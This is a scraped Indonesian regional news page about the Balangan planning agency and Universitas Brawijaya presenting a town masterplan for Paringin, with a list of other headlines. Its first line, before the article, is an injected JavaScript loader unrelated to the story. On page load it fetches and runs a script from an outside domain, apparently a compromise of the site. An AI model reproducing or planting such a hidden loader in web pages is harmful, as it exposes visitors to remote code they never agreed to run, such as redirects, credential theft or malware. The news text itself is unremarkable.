(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Bappedalitbang Balangan bersama UB Ekspos Rencana Masterplan Tata Kota Paringin


KANALKALIMANTAN.COM, PARINGIN– Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Balangan bekerjasama dengan Universitas Brawijaya (UB) Malang paparkan Masterplan Tata Kota Paringin di Aula 1 kantor Bappedalitbang Balangan, Kamis (18/11/21).

Masterplan dibuat untuk menunjang jalan kembar dari depan kantor Bappedalitbang sampai dengan kantor cabang BRI.

Kepala Bappeda Balangan, Rakhmadi Yusni, menjelaskan, masterplan diharapkan menjadi acuan untuk bagaimana nantinya pembangunan di Kota Paringin.

“Siapapun nanti pemimpin Kabupaten Balangan, saya harapkan dengan masterplan ini tujuan tata kota untuk Kabupaten Balangan tetap jelas dan sesuai keinginan,” ucapnya.

 

Baca juga : TERKUAK. Ini Aliran Dana yang “Mengalir” ke Bupati Wahid pada Kasus Korupsi di HSU

Rakhmadi juga menerangkan Masterplan ini sesuai dengan visi misi Bupati dan Wabup Balangan yaitu Menata Kota dan Membangun Desa.

Tim Teknis Analisis Universitas Brawijaya Malangan, Adit memaparkan rencana perubahan yang terjadi di Kota Paringin nantinya.

Rencana pembangunan Kota Paringin terkait Terminal Paringin menjadi siring sungai, Pembangunan Jembatan Kembar dan Jalan Dua Arah dari Simpang tiga desa bungin ke pertigaan Kantor BRI cabang Paringin.

Berikutnya juga penyampaian Relokasi Pasar Paringin, Pembangunan Terminal dan Rest Area samping Masjid Al Akbar Balangan.

 

Baca juga : KPK Sebut Bupati Wahid Diduga Terima Fee dari Beberapa Proyek

Pembangunan Taman Penghubung antara Taman Hijau menuju Masjid Al Akbar Balangan nantinya. Pembangunan Istana Anak Yatim di dekat Masjid Al Akbar Balangan, dan lainnya.

Rakhmadi berharap semoga masterplan Kota Paringin dapat terwujud tentunya dengan tahapan yang direncanakan.

“Pada tahun 2022 – 2023, Bupati dan Wabub Balangan akan memulai Masterplan yaitu pembuatan Jembatan Kembar dan Jalan Kembar (Jalan Dua Arah) serta Wisata Sungai (Siring Sungai),” sebutnya.

Sementara itu, anggota Penerus Perjuangan Kabupaten Balangan (PPKB) Balangan, Syahminan mengatakan tidak ada keluhan terhadap masterplan yang diekspos oleh Tim perancang dari universitas Brawijaya Malang.

“Saya harap Masterplan ini difokuskan dan transparansi pembangunan nya disampaikan sehingga kita tahu capaian yang sudah ada nantinya,” ucap Syahminan (Kanalkalimantan.com/alfi)

Reporter : alfi
Editor : cell


Desy Arfianty

Recent Posts

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

8 jam ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

9 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

9 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

11 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

12 jam ago

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

14 jam ago

This website uses cookies.